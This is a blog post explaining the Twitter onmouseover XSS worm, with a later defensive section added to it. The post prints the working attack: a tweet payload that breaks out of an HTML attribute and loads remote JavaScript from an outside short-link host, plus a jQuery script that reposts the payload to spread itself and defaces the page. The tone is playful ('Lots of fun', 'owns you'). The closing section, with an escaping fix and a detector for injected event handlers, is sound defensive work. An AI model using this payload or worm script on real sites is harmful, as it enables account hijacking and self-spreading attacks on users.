Eran Kampf

Write your own Twitter.com XSS exploit

So it seems the new twitter.com has a "virus" going around.
A few minutes ago my Twitter stream filled up with strange jQuery calls, so I looked into it.

Apparently the new Twitter website is vulnerable to a simple injection attack, much like SQL injection:
it will just spit out to the page whatever HTML code you write in your status, unescaped...

So, the exploit works like this:

Step 1:

User writes the following status line:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

The @" closes the title attribute of the tweet's HTML element and lets the attacker add his own attributes, specifically an onmouseover attribute that runs his JavaScript code whenever a user hovers over the tweet.

Step 2:

The onmouseover event fetches and executes remote JavaScript from

http://is.gd/fl9A7

Step 3:

The remote script (which, unlike the script embedded in the user's status, is not subject to the tweet's size limit) can basically do whatever the hacker wants.
This one just manipulates the page's HTML to submit a new tweet (the one from step #1) and spread itself:

[js wraplines="true"]
// Put the step #1 payload into the status box and submit it, so the tweet spreads itself.
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"\
onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();
// Then tamper with the page UI and post a second, plain-text tweet.
$('#status-field-char-counter').html("ekampf owns you!");
$('#status').val('I read how to do this on DeveloperZen.com');
$('.status-update-form').submit();
[/js]

Besides submitting tweets, the script can do pretty much whatever it wants with the page's UI.
Lots of fun...
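The bug behind all of this is the missing attribute escaping described above. The following is an added example, not code from the original post or from Twitter: a hypothetical renderer that copies the tweet's URL text into an anchor's title attribute unescaped, beside the hardened version, plus a small tokenizer that lists which attributes actually ended up in the start tag. The payload it uses is constructed with the same shape as the worm's but an inert handler; all function names are made up.

```javascript
// Added example (not from the original post). Models the attribute-injection
// bug the post describes and its fix; every name here is hypothetical.

// Escape the characters that can terminate an attribute value or a text node.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable renderer: the URL text is concatenated into the title attribute
// verbatim, so a '"' inside it closes the attribute early.
function renderLinkVulnerable(url) {
  return '<a title="' + url + '">' + url + '</a>';
}

// Hardened renderer: same template, but the untrusted value is escaped for the
// attribute context before concatenation.
function renderLinkSafe(url) {
  const e = escapeHtml(url);
  return '<a title="' + e + '">' + e + '</a>';
}

// Lower-cased names of the double-quoted attributes in the first <a> start tag.
// A tiny tokenizer suffices because both renderers emit exactly one anchor.
function attributeNames(html) {
  const tag = html.match(/^<a\b([^>]*)>/i);
  if (!tag) return [];
  return [...tag[1].matchAll(/([^\s="'\/>]+)\s*=\s*"([^"]*)"/g)]
    .map((m) => m[1].toLowerCase());
}

// true if any on* event-handler attribute made it into the start tag.
function hasInjectedHandler(html) {
  return attributeNames(html).some((n) => n.startsWith('on'));
}

// Constructed payload: same shape as the worm's, with an inert handler.
const SAMPLE_PAYLOAD =
  'http://t.co/@"style="font-size:999999999999px;"onmouseover="void(0)"/';

// hasInjectedHandler(renderLinkVulnerable(SAMPLE_PAYLOAD)) -> true
// hasInjectedHandler(renderLinkSafe(SAMPLE_PAYLOAD))       -> false
```

With the vulnerable renderer the tokenizer reports title, style and onmouseover as separate attributes; with the escaped one only title survives, the whole payload sitting harmlessly inside its value.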